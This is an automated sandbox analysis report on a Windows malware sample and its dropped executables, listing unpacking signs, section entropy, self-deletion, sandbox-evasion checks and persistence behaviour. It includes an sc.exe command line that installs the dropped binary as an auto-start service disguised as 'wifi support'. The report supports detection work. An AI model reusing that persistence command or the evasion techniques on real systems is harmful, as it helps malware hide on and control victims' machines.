                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: powrprof.pdbK source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.362658267.0000000003630000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.364317064.0000000003630000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: C:\siwuxidugo_jezupih_cokon\keb5_bajayojagih vahu\cofugu.pdb source: GNXG5XLBEH.exe, GNXG5XLBEH.exe, 00000000.00000000.237874920.0000000000401000.00000020.00020000.sdmp, GNXG5XLBEH.exe, 00000000.00000002.243174357.0000000000401000.00000020.00020000.sdmp, GNXG5XLBEH.exe, 00000001.00000000.241196595.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000012.00000002.338879338.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000012.00000000.332813687.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000013.00000000.336956368.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: =C:\tuxifazim\miwoto.pdbh source: 6BA5.exe, 0000001C.00000000.361905903.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001B.00000003.362658267.0000000003630000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.364317064.0000000003630000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 5BBC.exe, 00000015.00000000.344013914.0000000000413000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000002.412867900.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.411689423.0000000003750000.00000002.00020000.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: /C:\siwuxidugo_jezupih_cokon\keb5_bajayojagih vahu\cofugu.pdbh source: GNXG5XLBEH.exe, 00000000.00000000.237874920.0000000000401000.00000020.00020000.sdmp, GNXG5XLBEH.exe, 00000000.00000002.243174357.0000000000401000.00000020.00020000.sdmp, GNXG5XLBEH.exe, 00000001.00000000.241196595.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000012.00000002.338879338.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000012.00000000.332813687.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000013.00000000.336956368.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: C:\sotos20-pacutejisuv\cohehadu24 nunadokosu\web-90\y.pdb source: 6B9B.exe, 6B9B.exe, 00000017.00000000.353267493.0000000000401000.00000020.00020000.sdmp, 6B9B.exe, 00000017.00000002.362522821.0000000000401000.00000020.00020000.sdmp, 6B9B.exe, 0000001A.00000000.358217888.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: cfgmgr32.pdbm source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: 1C:\wayevuwuku\98\caharesiyopa_p.pdbh source: 77CC.exe, 0000001E.00000000.367538577.0000000000401000.00000020.00020000.sdmp, evjgtzc.exe, 0000002B.00000000.396059268.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\wayevuwuku\98\caharesiyopa_p.pdb source: 77CC.exe, 0000001E.00000000.367538577.0000000000401000.00000020.00020000.sdmp, evjgtzc.exe, 0000002B.00000000.396059268.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\sotos20-pacutejisuv\cohehadu24 nunadokosu\web-90\y.pdbh source: 6B9B.exe, 00000017.00000000.353267493.0000000000401000.00000020.00020000.sdmp, 6B9B.exe, 00000017.00000002.362522821.0000000000401000.00000020.00020000.sdmp, 6B9B.exe, 0000001A.00000000.358217888.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbS source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbk source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000001B.00000003.362887202.0000000003636000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.363451570.0000000003636000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.362674770.0000000003636000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 5BBC.exe, 00000015.00000000.344013914.0000000000413000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000002.412867900.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.411689423.0000000003750000.00000002.00020000.sdmp
                      Source: Binary string: shlwapi.pdbG source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: C:\tuxifazim\miwoto.pdb source: 6BA5.exe, 0000001C.00000000.361905903.0000000000401000.00000020.00020000.sdmp

                      Data Obfuscation:

                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe Unpacked PE file: 28.2.6BA5.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe Unpacked PE file: 30.2.77CC.exe.400000.0.unpack
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe Unpacked PE file: 43.2.evjgtzc.exe.400000.0.unpack
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe Unpacked PE file: 28.2.6BA5.exe.400000.0.unpack .text:ER;.data:W;.geravic:W;.pude:W;.vup:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe Unpacked PE file: 30.2.77CC.exe.400000.0.unpack .text:ER;.data:W;.hex:W;.suba:W;.vez:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe Unpacked PE file: 43.2.evjgtzc.exe.400000.0.unpack .text:ER;.data:W;.hex:W;.suba:W;.vez:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      .NET source code contains potential unpacker
                      Source: 6E36.exe.4.dr, Univesity_Grade_Calculator/Form1.cs .Net Code: Form1_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 8058.exe.4.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 31.2.8058.exe.d00000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 31.0.8058.exe.d00000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 31.0.8058.exe.d00000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 31.0.8058.exe.d00000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 31.0.8058.exe.d00000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe Code function: 0_2_0074042E push esi; ret
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe Code function: 0_2_007403C9 push esi; ret
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe Code function: 1_2_00401880 push esi; iretd
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe Code function: 1_2_00402E94 push es; iretd
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe Code function: 1_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\ttfssdi Code function: 19_2_00401880 push esi; iretd
                      Source: C:\Users\user\AppData\Roaming\ttfssdi Code function: 19_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\ttfssdi Code function: 19_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exe Code function: 21_2_00412CA4 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe Code function: 23_2_00643634 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe Code function: 26_2_00401880 push esi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe Code function: 26_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe Code function: 26_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe Code function: 28_2_0041A6F9 pushad ; retf
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe Code function: 28_2_0041A14B push C00086B6h; retf
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe Code function: 28_2_0041A3E9 push C00086B6h; retf
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe Code function: 28_2_0041A5EC push eax; iretd
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe Code function: 28_2_004139B0 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe Code function: 30_2_0043DFF4 push ebp; retf 0042h
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe Code function: 0_2_00435AD0 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: 2D8F.exe.4.dr Static PE information: 0xAB35ADD6 [Sat Jan 8 14:57:26 2061 UTC]
                      Source: GNXG5XLBEH.exe Static PE information: section name: .vaxego
                      Source: GNXG5XLBEH.exe Static PE information: section name: .gig
                      Source: GNXG5XLBEH.exe Static PE information: section name: .hojotew
                      Source: 1523.exe.4.dr Static PE information: section name:
                      Source: 1523.exe.4.dr Static PE information: section name:
                      Source: 1523.exe.4.dr Static PE information: section name:
                      Source: 1523.exe.4.dr Static PE information: section name:
                      Source: 1523.exe.4.dr Static PE information: section name:
                      Source: 1523.exe.4.dr Static PE information: section name:
                      Source: 1523.exe.4.dr Static PE information: section name: .28gybOo
                      Source: 1523.exe.4.dr Static PE information: section name: .adata
                      Source: 2D8F.exe.4.dr Static PE information: section name: .didata
                      Source: 4955.exe.4.dr Static PE information: section name: _RDATA
                      Source: 54D0.exe.4.dr Static PE information: section name:
                      Source: 54D0.exe.4.dr Static PE information: section name:
                      Source: 54D0.exe.4.dr Static PE information: section name:
                      Source: 54D0.exe.4.dr Static PE information: section name:
                      Source: 54D0.exe.4.dr Static PE information: section name:
                      Source: 54D0.exe.4.dr Static PE information: section name:
                      Source: 54D0.exe.4.dr Static PE information: section name: .2pZFPAB
                      Source: 54D0.exe.4.dr Static PE information: section name: .adata
                      Source: 6471.exe.4.dr Static PE information: section name:
                      Source: 6471.exe.4.dr Static PE information: section name:
                      Source: 6471.exe.4.dr Static PE information: section name:
                      Source: 6471.exe.4.dr Static PE information: section name:
                      Source: 6471.exe.4.dr Static PE information: section name:
                      Source: 6471.exe.4.dr Static PE information: section name:
                      Source: 6471.exe.4.dr Static PE information: section name: .kujN2o2
                      Source: 6471.exe.4.dr Static PE information: section name: .adata
                      Source: 6B9B.exe.4.dr Static PE information: section name: .tuv
                      Source: 6B9B.exe.4.dr Static PE information: section name: .bezax
                      Source: 6B9B.exe.4.dr Static PE information: section name: .lelepar
                      Source: 6BA5.exe.4.dr Static PE information: section name: .geravic
                      Source: 6BA5.exe.4.drStatic PE information: section name: .pude
                      Source: 6BA5.exe.4.drStatic PE information: section name: .vup
                      Source: 77CC.exe.4.drStatic PE information: section name: .hex
                      Source: 77CC.exe.4.drStatic PE information: section name: .suba
                      Source: 77CC.exe.4.drStatic PE information: section name: .vez
                      Source: 13C.exe.4.drStatic PE information: section name: _RDATA
                      Source: ttfssdi.4.drStatic PE information: section name: .vaxego
                      Source: ttfssdi.4.drStatic PE information: section name: .gig
                      Source: ttfssdi.4.drStatic PE information: section name: .hojotew
                      Source: evjgtzc.exe.30.drStatic PE information: section name: .hex
                      Source: evjgtzc.exe.30.drStatic PE information: section name: .suba
                      Source: evjgtzc.exe.30.drStatic PE information: section name: .vez
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .didata
                      Source: 54D0.exe.4.drStatic PE information: real checksum: 0x36d1e8 should be: 0x37985e
                      Source: 6471.exe.4.drStatic PE information: real checksum: 0x373823 should be: 0x3738f9
                      Source: 74DE.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x14e78b
                      Source: 1523.exe.4.drStatic PE information: real checksum: 0x3721bb should be: 0x373654
                      Source: 8058.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x9011f
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.97280495233
                      Source: initial sampleStatic PE information: section name: entropy: 7.99714766582
                      Source: initial sampleStatic PE information: section name: entropy: 7.90784224501
                      Source: initial sampleStatic PE information: section name: entropy: 7.99361781473
                      Source: initial sampleStatic PE information: section name: entropy: 7.80912989946
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22348700263
                      Source: initial sampleStatic PE information: section name: .28gybOo entropy: 7.91849564721
                      Source: initial sampleStatic PE information: section name: .didata entropy: 7.99713235918
                      Source: initial sampleStatic PE information: section name: entropy: 7.99715965774
                      Source: initial sampleStatic PE information: section name: entropy: 7.90405352991
                      Source: initial sampleStatic PE information: section name: entropy: 7.99357874577
                      Source: initial sampleStatic PE information: section name: entropy: 7.7922746648
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.23071246858
                      Source: initial sampleStatic PE information: section name: .2pZFPAB entropy: 7.9174117718
                      Source: initial sampleStatic PE information: section name: entropy: 7.99715248044
                      Source: initial sampleStatic PE information: section name: entropy: 7.90789134233
                      Source: initial sampleStatic PE information: section name: entropy: 7.99431797903
                      Source: initial sampleStatic PE information: section name: entropy: 7.81839424264
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22755578232
                      Source: initial sampleStatic PE information: section name: .kujN2o2 entropy: 7.91856580958
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.9726708833
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.9846657802
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96432404195
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.97280495233
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96432404195
                      Source: 8058.exe.4.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 8058.exe.4.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 31.2.8058.exe.d00000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 31.2.8058.exe.d00000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 31.0.8058.exe.d00000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 31.0.8058.exe.d00000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 31.0.8058.exe.d00000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 31.0.8058.exe.d00000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 31.0.8058.exe.d00000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 31.0.8058.exe.d00000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 31.0.8058.exe.d00000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 31.0.8058.exe.d00000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'

                      Persistence and Installation Behavior:

                      Drops executables to the windows directory (C:\Windows) and starts them
                      Source: unknown | Executable created and started: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\ttfssdi
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\D9EC.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\6BA5.exe
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | File created: C:\Users\user\AppData\Local\Temp\evjgtzc.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\6B9B.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\54D0.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\4955.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\6E36.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\77CC.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\1523.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\74DE.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\ttfssdi
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\5BBC.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\6471.exe
                      Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe (copy)
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\2205.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\13C.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\2D8F.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\8058.exe
                      Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe (copy)
                      Source: C:\Windows\SysWOW64\svchost.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ceaplexz
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Code function: 30_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      Hooking and other Techniques for Hiding and Protection:

                      Deletes itself after installation
                      Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\gnxg5xlbeh.exe
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\ttfssdi:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe | Code function: 28_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\SysWOW64\WerFault.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\BackgroundTransferHost.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Process information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Process information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe | Process information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOGPFAULTERRORBOX

                      Malware Analysis System Evasion:

                      Found evasive API chain (may stop execution after checking mutex)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: ttfssdi, 00000013.00000002.354469591.0000000000757000.00000004.00000020.sdmpBinary or memory string: ASWHOOK
                      Source: 6B9B.exe, 0000001A.00000002.375624964.000000000069B000.00000004.00000020.sdmpBinary or memory string: ASWHOOK<
                      Found evasive API chain (may stop execution after checking locale)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
